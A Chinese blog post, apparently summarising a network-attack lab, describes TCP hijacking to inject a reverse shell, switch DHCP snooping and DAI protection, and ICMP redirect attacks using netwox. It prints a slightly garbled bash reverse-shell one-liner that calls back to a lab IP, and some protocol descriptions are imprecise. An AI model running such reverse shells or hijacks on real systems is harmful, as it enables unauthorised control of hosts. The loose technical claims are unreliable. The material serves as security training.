协议栈实战：TCP劫持与ICMP重定向实验

本篇博客记录了作者在网络攻防实验中的初步探索，主要涉及三个方面的协议栈攻击技术：TCP劫持shell反弹、交换机上的DHCP snooping DAI IPS保护以及ICMP重定向攻击。 首先，TCP劫持shell反弹部分，黑客通过在本地机器（192.168.168.131）上开启一个监听端口（8888），利用`bash -i >&/dev/tcp/192.168.168.131/88880>&1`这一命令将输入重定向到远程服务器。将此命令转换为十六进制后，黑客会在假的TCP报文中使用这个数字来发送恶意数据，使得连接的目标（如DataServer）实际上执行了黑客的shell命令。实验结果显示，黑客成功实现了对DataServer的控制。 接着，作者讨论了DHCP snooping DAI IPS（Dynamic ARP Inspection）在交换机（S1）上的配置。DHCP snooping是一种网络安全机制，用于防止ARP欺骗和非法的DHCP服务，DAI IPS进一步增强了这种保护，通过检查DHCP请求和应答来检测潜在的攻击。然而，后续的配置步骤并未详述，显示出这部分可能需要更深入的理解和实践。 最后，ICMP重定向攻击部分，作者构建了一个简单的网络拓扑，其中Kali系统作为攻击者，可以通过设置端口转发功能，利用netwox工具发送伪造的ICMP重定向报文，误导目标路由器改变路由策略。例如，当PC1试图ping PC2时，由于ICMP重定向，攻击者可以在交换机G0/0/2上抓包，实现对通信路径的控制，达到阻断或监控目的。 这篇博客提供了一种实战视角，展示了如何利用协议栈进行基础的网络攻击，并提到了一些关键的配置和操作技巧。对于网络攻防、安全审计或者想深入了解网络协议的读者来说，这是一个很好的学习资料，强调了理解并掌握这些技术的重要性。